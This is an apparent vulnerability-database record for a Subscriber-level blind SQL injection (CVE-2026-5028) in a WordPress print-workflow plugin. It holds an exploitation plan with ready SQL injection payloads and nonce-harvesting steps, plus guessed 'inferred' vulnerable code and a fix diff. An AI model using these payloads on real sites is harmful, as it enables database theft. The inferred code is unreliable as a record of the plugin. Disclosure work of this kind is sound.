[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhIujCNaJkpS3PkE5am78wH7PpQ4Co6UQi_ova4eaLEE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5028","eight-day-week-print-workflow-authenticated-subscriber-sql-injection-via-title-parameter","Eight Day Week Print Workflow \u003C= 1.2.6 - Authenticated (Subscriber+) SQL Injection via 'title' Parameter","The Eight Day Week Print Workflow plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'title' parameter in the `pp-get-articles` AJAX action in all versions up to, and including, 1.2.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","eight-day-week-print-workflow",null,"\u003C=1.2.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-11 19:03:26","2026-05-19 17:43:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc9bb4fae-5a5a-4c1b-a1dd-1aecc0f4b114?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5028 (Eight Day Week Print Workflow)\n\n## 1. Vulnerability Summary\nThe **Eight Day Week Print Workflow** plugin (\u003C= 1.2.6) is vulnerable to a time-based blind SQL Injection via the `title` parameter. The vulnerability exists within the AJAX handler for the `pp-get-articles` action. The plugin fails to use `$wpdb->prepare()` or sufficient escaping when incorporating the user-supplied `title` into a database query. This allows authenticated users (with at least Subscriber-level permissions) to execute arbitrary SQL commands by appending malicious payloads to the query.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **HTTP Method:** `POST`\n- **Action:** `pp-get-articles` (Hook: `wp_ajax_pp-get-articles`)\n- **Vulnerable Parameter:** `title`\n- **Authentication:** Required (Subscriber or higher).\n- **Vulnerability Type:** Time-based Blind SQL Injection.\n- **Preconditions:** The attacker must be logged in as a Subscriber.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A user sends a POST request to `admin-ajax.php` with `action=pp-get-articles`.\n2. **Hook Trigger:** WordPress triggers the `wp_ajax_pp-get-articles` action.\n3. **Handler Function:** A function (likely named `pp_get_articles` or similar within the plugin's main class) is called.\n4. **Input Retrieval:** The handler retrieves the `title` parameter directly from `$_POST['title']`.\n5. **SQL Construction:** The `title` value is concatenated into a SQL string. Based on the name `pp-get-articles`, the query likely looks like: \n   `SELECT ... FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND ...`\n6. **Execution:** The raw query is passed to `$wpdb->get_results()` without the protection of `$wpdb->prepare()`.\n7. **Sink:** The database executes the injected time-delay command (e.g., `SLEEP()`).\n\n## 4. Nonce Acquisition Strategy\nAJAX actions in WordPress typically require a security nonce. For the `pp-get-articles` action, the nonce is likely localized for use in the admin dashboard.\n\n1. **Identify Script Localization:** Search the plugin code for `wp_localize_script`. Common identifiers might include `edw_admin_params` or `pp_ajax_obj`.\n2. **Setup:** Create a Subscriber user and log in.\n3. **Navigation:** Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n4. **Extraction:**\n   - Use `browser_navigate` to load the dashboard.\n   - Use `browser_eval` to search for the nonce. \n   - **Target Variable (Inferred):** `window.edw_settings?.nonce` or `window.pp_vars?.nonce`.\n   - **Manual Verification:** If the variable name is unknown, use `browser_eval(\"Object.keys(window).filter(k => k.includes('pp') || k.includes('edw'))\")` to find relevant objects.\n\n## 5. Exploitation Strategy\nThe exploitation will use a time-based blind approach to confirm the injection.\n\n### Step 1: Authentication\nLog in as the Subscriber user and capture session cookies.\n\n### Step 2: Confirmation of Vulnerability (Time Delay)\nSend a baseline request and then a request with a `SLEEP` command.\n\n**Baseline Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=pp-get-articles&title=test&security=[NONCE]\n```\n\n**Malicious Request (SQLi):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=pp-get-articles&title=test' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1&security=[NONCE]\n```\n\n### Step 3: Data Extraction (Example: Database Version)\nTo extract the first character of the database version:\n**Payload:**\n`title=test' AND (SELECT IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)) AND '1'='1`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `eight-day-week-print-workflow` version 1.2.6 is installed and active.\n2. **User Creation:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Content:** Ensure at least one post exists so the original query has something to work with.\n   - `wp post create --post_title=\"Sample Article\" --post_status=publish`\n\n## 7. Expected Results\n- **Normal Request:** Returns near-instantly (e.g., \u003C 200ms).\n- **Exploit Request:** The server response is delayed by exactly the number of seconds specified in the `SLEEP()` function (e.g., 5 seconds).\n- **HTTP Response:** Usually `200 OK` with a JSON body (possibly empty or `{\"success\":true}`) or `0`\u002F`-1` if the handler doesn't return data but still executes the query.\n\n## 8. Verification Steps\n1. **Verify Delay:** Check the `elapsed_time` of the `http_request`. If it exceeds the sleep threshold, SQLi is confirmed.\n2. **Check Logs:** Inspect the MySQL general log (if enabled) or use a tool like `tcpdump` to see the query being sent to the database.\n   - `tail -f \u002Fvar\u002Flib\u002Fmysql\u002Fhostname.log` (if logging is on).\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is enabled, try inducing a syntax error to see if `$wpdb->last_error` is reflected in the response:\n  - `title=test' OR (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT VERSION()),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -`\n- **Boolean-Based:** If the response body changes based on the query result (e.g., articles found vs. not found), use a boolean-based payload:\n  - `title=test' AND 1=1-- -` (True)\n  - `title=test' AND 1=2-- -` (False)\n- **Different Parameter:** If `title` is not the only vulnerable parameter, check other parameters in `pp-get-articles` like `post_type` or `category`.","The Eight Day Week Print Workflow plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'title' parameter in the 'pp-get-articles' AJAX action. This is due to the plugin directly concatenating unescaped user input into a SQL query, allowing authenticated attackers with Subscriber-level permissions to execute arbitrary SQL commands.","\u002F* Inferred from research plan code flow: wp_ajax_pp-get-articles handler *\u002F\n\npublic function pp_get_articles() {\n    $title = $_POST['title'];\n    global $wpdb;\n\n    \u002F\u002F The title parameter is concatenated directly into the query string without preparation\n    $query = \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND post_status = 'publish'\";\n    $results = $wpdb->get_results($query);\n\n    \u002F\u002F ... (truncated)\n}","--- a\u002Feight-day-week-print-workflow\u002Fincludes\u002Fclass-eight-day-week-ajax.php\n+++ b\u002Feight-day-week-print-workflow\u002Fincludes\u002Fclass-eight-day-week-ajax.php\n@@ -10,7 +10,10 @@\n-    $query = \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$title%' AND post_status = 'publish'\";\n-    $results = $wpdb->get_results($query);\n+    $query = $wpdb->prepare(\n+        \"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE %s AND post_status = 'publish'\",\n+        '%' . $wpdb->esc_like($title) . '%'\n+    );\n+    $results = $wpdb->get_results($query);","The exploit targets the 'pp-get-articles' AJAX action available to authenticated users. An attacker logs in as a Subscriber, retrieves the required AJAX nonce from the WordPress admin dashboard (localized script variables), and sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php. The payload is delivered via the 'title' parameter and uses SQL syntax to induce a time delay (e.g., ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1). By measuring the server's response time, the attacker can verify the vulnerability and exfiltrate data bit-by-bit using conditional SLEEP statements.","gemini-3-flash-preview","2026-05-20 18:53:49","2026-05-20 18:54:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feight-day-week-print-workflow\u002Ftags"]
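Review bot: the research_fix_diff hunk hardens only the query construction; the read shown just above it in the inferred handler, `$title = $_POST['title'];`, is still consumed raw. WordPress adds slashes to `$_POST`, so without `wp_unslash()` a title containing a quote or backslash is matched with its slash intact, and the value should also go through `sanitize_text_field()` before it becomes the LIKE pattern. The hunk likewise shows no `check_ajax_referer()` or capability check ahead of the query, even though the research plan assumes a `security` nonce is required; if the real handler lacks one, it should be added alongside the prepared statement.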